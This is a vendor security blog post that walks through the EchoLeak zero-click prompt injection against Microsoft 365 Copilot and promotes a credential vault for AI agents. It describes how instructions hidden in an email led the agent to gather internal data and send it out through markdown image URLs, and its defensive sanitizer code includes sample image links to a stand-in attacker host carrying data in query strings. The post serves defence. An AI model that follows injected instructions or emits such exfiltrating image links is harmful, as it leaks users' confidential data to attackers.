Security Blog

AI agents are now phishing targets

#16

June 13, 2026 · By Marketing team


EchoLeak (CVE-2025-32711) was the first zero-click exploit against an AI agent: a hidden instruction in an email turned Microsoft 365 Copilot against its own user, no click required. The defense that matters is not catching every prompt injection, it is making sure a hijacked agent cannot reach your credentials.

Nobody clicked anything, and they got phished anyway. The phishing email has always needed a gullible human on the other end, someone to click the link, type the password, approve the prompt. EchoLeak did not bother. There was no human to fool. The mark was the agent.

That is the part people keep getting wrong about it. There was no bad link to avoid, no attachment to not open, no login page to not fall for. The victim did nothing, because there was nothing for them to do. The attack ran entirely on the agent.

The shape of it

CVE-2025-32711 [3], found by Aim Labs [1], rated 9.3 by Microsoft [2]. An attacker sends an ordinary-looking email to someone inside an organization running Microsoft 365 Copilot. Buried in that email are instructions written for the model, not the human. The human never has to read it. At some point Copilot does what it is built to do, reaches into the user's world to answer a question, and its own retrieval pulls the poisoned email in alongside everything else. Now the malicious instructions are inside the model's context, indistinguishable from the real task. The model follows them. It goes and gathers what it can reach, SharePoint, OneDrive, Teams, the things this user is allowed to see, and it walks the data back out through a markdown image URL pointed at the attacker's server [1]. The browser fetches the image. The fetch carries the secret. Zero clicks, start to finish.
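The exfiltration step above rests on one thing: the renderer fetches whatever image URL the model emits, and the URL can carry copied text in its query string. An output filter that refuses image references to hosts outside an allowlist removes that channel regardless of which injection got through. The following is an added example written for this post, not Microsoft's or Aim Labs' code; the allowlist host, the attacker host and the sample agent answer are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts the renderer may fetch images from (constructed allowlist for this example).
ALLOWED_IMAGE_HOSTS = {"cdn.example-corp.internal"}

# Inline markdown image: ![alt text](url "optional title")
_MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*(<[^>]*>|[^\s)]+)(?:\s+"[^"]*")?\s*\)')
# Raw HTML <img> tags, which some markdown renderers pass through unchanged.
_HTML_IMAGE = re.compile(r"<img\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"][^>]*>", re.IGNORECASE)


def _is_allowed(url: str) -> bool:
    """Only https URLs whose host is on the allowlist may be fetched."""
    parsed = urlparse(url.strip("<>"))
    if parsed.scheme != "https":
        return False  # http:, data:, file: and friends are never fetched
    return parsed.hostname in ALLOWED_IMAGE_HOSTS


def sanitize_agent_output(text: str):
    """Return (sanitized_text, blocked_urls).

    Every image reference whose host is not allowlisted is replaced by a visible
    placeholder, so the renderer never issues the fetch that would carry data out.
    """
    blocked = []

    def _md_repl(match):
        url = match.group(2).strip("<>")
        if _is_allowed(url):
            return match.group(0)
        blocked.append(url)
        return f"[image blocked: {match.group(1) or 'untrusted source'}]"

    def _html_repl(match):
        url = match.group(1)
        if _is_allowed(url):
            return match.group(0)
        blocked.append(url)
        return "[image blocked: untrusted source]"

    text = _MD_IMAGE.sub(_md_repl, text)
    text = _HTML_IMAGE.sub(_html_repl, text)
    return text, blocked


# Constructed sample of what a hijacked agent's answer might look like: one
# legitimate chart, then two "images" whose URLs smuggle text out in the query.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![chart](https://cdn.example-corp.internal/q3.png)\n"
    "![](https://attacker.example/pixel.png?d=Q3%20forecast%3A%20confidential)\n"
    '<img src="http://attacker.example/x.gif?u=alice">'
)

if __name__ == "__main__":
    clean, blocked = sanitize_agent_output(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
```

The filter is a last line of defence, not a substitute for rendering agent output under a Content Security Policy that forbids external image loads altogether; the two together mean a successful injection produces a logged, blocked URL rather than a silent fetch.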

Microsoft fixed it server-side, no customer action required, and reported no evidence it was exploited in the wild [2]. The research went public in June 2025 [4]. The specific hole is closed. The shape is not.

Notice what actually did the work. The attacker never broke in. They never touched SharePoint, never stole a password, never ran code on anyone's machine. They wrote an email. The agent did everything else, using access it already had, on behalf of a user who never asked. The danger was not an intruder you could block at the door. It was your own assistant, turned around mid-sentence and pointed back at you.

Why this one matters more than a CVE

Prompt injection is not a bug you finish fixing. A large language model follows instructions in its context. That is not a flaw in the product, that is the product. As long as untrusted text can reach the context, and for any useful agent it can, some fraction of injections will slip past the classifiers. You will eventually run an agent that has been quietly told to do something you did not ask for. Treat that as a certainty, because the people attacking you already do.

So the question stops being how to keep every malicious instruction out. You will not win that race cleanly, the same way you will not out-vet a supply chain. The real question is the one you can actually answer with architecture.

> When your agent is turned against you, what can it reach?

For most setups, the honest answer is everything. The agent runs with broad ambient access, a wide grant of standing permission, because that was the easy way to make it useful. It can see the whole share. It can enumerate. It can wander. EchoLeak weaponized exactly that. The hijack was the spark, but the blast radius was the access.

Keep the crown jewels out of reach

This is the part Clavitor is built around, for credentials specifically. We do not promise to stop prompt injection, and we are not standing in front of your documents. What we refuse is the buffet. An agent on Clavitor cannot reach a credential it was not explicitly named to use. There is no list to read, no search, no discovery: enumeration is impossible at the protocol level, not merely throttled. The credential is fetched fresh at the instant of use, never stored, never cached, gone again after. Every access is logged to a specific actor. The grant is pinned to the machine it was issued to, so a grant lifted and replayed from somewhere else is simply refused. And it is rate-limited, so an agent reaching past its normal handful trips an alert and locks instead of sweeping the vault.

Run the EchoLeak playbook against that and it stalls. A hijacked agent can still be told to go gather secrets. It just has nowhere to gather them from. It cannot ask what credentials exist. It cannot pull the ones it was never granted. The one it legitimately holds at that instant, used live, can be misused for that instant, and that is the honest edge of the claim, no architecture rewrites physics. But the move that makes these attacks devastating, one compromise reaching everything at once, is the exact move that does not work. Broad ambient access turns a clever email into a breach. Scoped, named, audited access turns the same email into a logged request for one thing the agent already had, and nothing else.
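The two paragraphs above describe a design, not just a product: grants named per actor, credential and machine; no enumeration path; a fresh fetch on every use; an audit entry for every attempt; and a rate limit that locks the actor rather than throttling it. The example below is an added illustration of that design in a few dozen lines of Python; it is not Clavitor's code and makes no claim about Clavitor's protocol or API. The store, the actor names and the attempt sequence are constructed for the demonstration.

```python
import time
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set, Tuple


@dataclass(frozen=True)
class Grant:
    actor: str        # the agent identity the grant was issued to
    credential: str   # the single named credential it may use
    machine_id: str   # the host the grant is pinned to


class Refused(Exception):
    pass


@dataclass
class CredentialBroker:
    # Called at the instant of use; the broker never retains what it returns.
    fetch_from_store: Callable[[str], str]
    grants: Set[Grant] = field(default_factory=set)
    max_per_window: int = 3            # "normal handful" of uses per window
    window_seconds: float = 60.0
    clock: Callable[[], float] = time.monotonic   # injectable for tests
    audit_log: List[Tuple[float, str, str, str, str]] = field(default_factory=list)
    _recent: Dict[str, deque] = field(default_factory=lambda: defaultdict(deque))
    _locked: Set[str] = field(default_factory=set)

    def issue(self, actor: str, credential: str, machine_id: str) -> None:
        self.grants.add(Grant(actor, credential, machine_id))

    # Deliberately no list(), search() or exists(): the only question the broker
    # answers is whether THIS (actor, credential, machine) triple was named.
    def use(self, actor: str, credential: str, machine_id: str) -> str:
        now = self.clock()

        def deny(reason: str):
            self.audit_log.append((now, actor, credential, machine_id, reason))
            raise Refused(reason)

        if actor in self._locked:
            deny("locked")
        # Every attempt counts against the window, refused ones included, so a
        # sweep of guesses trips the lock just as fast as a sweep of real uses.
        recent = self._recent[actor]
        while recent and now - recent[0] > self.window_seconds:
            recent.popleft()
        recent.append(now)
        if len(recent) > self.max_per_window:
            self._locked.add(actor)
            deny("rate-limit-locked")   # alert hook would go here
        # Wrong machine, wrong credential and nonexistent credential all get the
        # same answer, so a refusal reveals nothing about what else exists.
        if Grant(actor, credential, machine_id) not in self.grants:
            deny("no-grant")
        self.audit_log.append((now, actor, credential, machine_id, "ok"))
        return self.fetch_from_store(credential)   # fresh each time, never cached


def demo() -> List[str]:
    """Replay an EchoLeak-style sweep against the broker; return the audit outcomes."""
    store = {"db-prod": "s3cr3t-db", "smtp-relay": "s3cr3t-smtp"}  # constructed
    now = [1000.0]
    broker = CredentialBroker(fetch_from_store=store.__getitem__, clock=lambda: now[0])
    broker.issue("report-agent", "db-prod", "host-a")
    attempts = [
        ("report-agent", "db-prod", "host-a"),      # the one legitimate use
        ("report-agent", "db-prod", "host-b"),      # same grant replayed elsewhere
        ("report-agent", "smtp-relay", "host-a"),   # reaching for an unnamed secret
        ("report-agent", "db-prod", "host-a"),      # fourth reach in the window: locks
        ("report-agent", "db-prod", "host-a"),      # already locked
    ]
    for actor, credential, machine in attempts:
        now[0] += 1.0
        try:
            broker.use(actor, credential, machine)
        except Refused:
            pass
    return [entry[-1] for entry in broker.audit_log]


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```

The point to take from the audit trail is the blast radius: the hijacked agent's one legitimate use succeeds, and every reach beyond it is a refused, logged request that also burns down the rate budget until the actor is locked. Nothing in the broker can tell the agent what else is in the store.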

Nobody clicked anything. That is not the failure, that is the future. The agent is the attack surface now. So stop handing it the keys to everything and hoping the classifier holds. Give it the use of exactly what it was named for, on the record, and make sure that when it gets turned around, the room it walks into is nearly empty.

Clavitor is the credential vault built for AI agents, and against them.

Sources

  1. Aim Labs — Breaking down EchoLeak, the first zero-click AI vulnerability enabling data exfiltration from Microsoft 365 Copilot (published via Cato Networks)
  2. Microsoft Security Response Center — CVE-2025-32711 (Microsoft rating CVSS 9.3)
  3. NVD — CVE-2025-32711 (NIST base score 7.5; Microsoft 9.3)
  4. The Hacker News — Zero-click AI vulnerability exposes Microsoft 365 Copilot data without user interaction